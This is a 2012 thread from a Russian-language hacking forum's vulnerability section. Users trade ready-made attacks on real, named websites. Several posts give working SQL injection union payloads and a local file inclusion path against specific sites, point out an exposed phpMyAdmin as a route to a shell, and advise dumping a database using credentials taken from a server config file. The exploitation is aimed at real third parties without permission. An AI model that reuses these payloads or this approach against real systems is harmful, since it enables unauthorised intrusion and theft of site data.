HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19301  
Старый 17.01.2012, 01:07
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

http://www.toytricksy.com/?a=index

проконсультируйте это пхп инъекцыя иль нет??
 
Ответить с цитированием

  #19302  
Старый 17.01.2012, 01:17
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от pirat0  
pirat0 said:
http://www.toytricksy.com/?a=index
проконсультируйте это пхп инъекцыя иль нет??
нет. это ошибка подключения другого файла, который не передаётся в параметре.
 
Ответить с цитированием

  #19303  
Старый 17.01.2012, 01:41
AnGeI
Участник форума
Регистрация: 08.12.2008
Сообщений: 164
Провел на форуме:
862722

Репутация: 54
По умолчанию

Цитата:
Сообщение от None  
http://ckk.sakh.com/interface.php?file=
Инклуд с фильтром:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]import_request_variables[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'GPC'[/COLOR][COLOR="#007700"]);

if ([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'..'[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'//'[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'http'[/COLOR][COLOR="#007700"])

||[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'interface'[/COLOR][COLOR="#007700"]) ) exit;

[/
COLOR][/COLOR
Есть ли там где-то еще читалка, с помощью которой этот код можно получить? (код получен не мною)
 
Ответить с цитированием

  #19304  
Старый 17.01.2012, 02:46
justonline
Guest
Сообщений: n/a
Провел на форуме:
179355

Репутация: 53
По умолчанию

http://www.sitc.ru/index.php?id=90000512

тиц 350

blind sql.

реально такое раскрутить? без information_schema то
 
Ответить с цитированием

  #19305  
Старый 17.01.2012, 06:22
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

Реально, также брутишь таблицы, колонки и через блайнд забираешь инфу. И еще, там не слепая инъекция:

Код:
Code:
http://www.sitc.ru/index.php?id=90000512%27+and+5=4+union+select+1,2,3,4,5,version%28%29,7,8,9,10,11,12,13--+
-----------------------

AnGeI, думаю стоит копать в сторону соседних сайтов. Вот сайн на том же сервере

http://cdut.sakh.com/phpmyadmin/ - открытый phpmyadmin (setup.php нету)

есть инъекция, только толку от нее нет особого

Код:
Code:
http://cdut.sakh.com/?view=forum&fid=-2161%27+union+select+1,2,3,4,5,6--+
есть рабочий инклуд

Код:
Code:
http://cdut.sakh.com/?nauka=index&project=../../avatars/0.gif%00
залить аватару свою не удалось, там вылетает ошибка с open_basedir. Так что если найдешь что инклудить считай шел есть

Ну и доступ в админку, авторизация на самом сайте

...

Дальше копать лень, ибо все равно там ничего интересного нет, удачи
 
Ответить с цитированием

  #19306  
Старый 18.01.2012, 00:48
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

http://rzva.ru/js/menu.php?language=russian' подскажите что можно сделать, а то чет не реагирует на запросы((
 
Ответить с цитированием

  #19307  
Старый 18.01.2012, 02:16
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

Ребята, какая то мне не понятная ситуация ))

в одном сервере мне надо "выгрузить" (дампить) SQL базу и чтоб нормально читался

через бразуер когда открываю на сервере - получаю что то в роде шифрованного текста, пытался кодировку менять, но бестолку..

но там также есть конфиграционный файл, с логином и паролем типа такого:

Код:
Code:
mysql username = "logn"
mysql password = "password"

###

'1 list' table name        = "rep1"
'reports' table name prefix  = "rep2"
'2' table name = "h"

mysql db name  = "NAME"
mysql host     = "127.0.0.1"
mysql port     = "3306"
mysql unix socket = "/var/run/mysqld/mysqld.sock"

### config end
помогите снять информацию !

Не пинать сильно, можно сказать не соображаю в этом деле )) особо в кодинге php/sql, по этому лучше посоветуйте как можно "автоматический" метод.
 
Ответить с цитированием

  #19308  
Старый 18.01.2012, 02:34
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
через бразуер когда открываю на сервере - получаю что то в роде шифрованного текста, пытался кодировку менять, но бестолку..
ты уже сделал дамп? что ты в браузере открываешь?

если сделал, то скачай его на винт и открывай не в браузере.

если нет, то найди пма, залогинись с данными из файла и сделай экспорт базы. возможные папки:

phpmyadmin

pma

myadmin, etc... гугли

если есть доступ к файлам, то поставь дампер какой-нить, например:

http://sypex.net/ru/products/dumper/downloads/

если есть доступ к консоли, то через mysqldump сделай:

http://dev.mysql.com/doc/refman/5.1/en/mysqldump.html
 
Ответить с цитированием

  #19309  
Старый 18.01.2012, 06:50
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию

Цитата:
Сообщение от pirat0  
pirat0 said:
http://rzva.ru/js/menu.php?language=russian' подскажите что можно сделать, а то чет не реагирует на запросы((
Там что-то типа

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

if([/
COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'language'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'russian'[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT .. WHERE lang=[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]AND ...."[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR
Думаю что как-то так и выглядит код.

Инъекции нет.

Цитата:
Сообщение от AnGeI  
AnGeI said:
Инклуд с фильтром:
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]import_request_variables[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'GPC'[/COLOR][COLOR="#007700"]);

if ([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'..'[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'//'[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'http'[/COLOR][COLOR="#007700"])

||[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'interface'[/COLOR][COLOR="#007700"]) ) exit;

[/
COLOR][/COLOR
Есть ли там где-то еще читалка, с помощью которой этот код можно получить? (код получен не мною)
Этот код просто написан по реакции скрипта на параметры, не более.

Цитата:
Сообщение от justonline  
justonline said:
http://www.sitc.ru/index.php?id=90000512
тиц 350
blind sql.
реально такое раскрутить? без information_schema то
Где ты там Blind нашел?

http://www.sitc.ru/index.php?id=90000512%27%20and%201=3%20union%20sel ect%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13%20--%201

Да, версия 4, обычный брут таблиц/колонок катит.
 
Ответить с цитированием

  #19310  
Старый 19.01.2012, 11:18
narviss
Guest
Сообщений: n/a
Провел на форуме:
2851

Репутация: 0
По умолчанию

Эээ..идиотский фильтр

Дело в том, что фильтруется точка information_shema. так что information_shema никак ненапишешь...как обойти такой фильтр?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ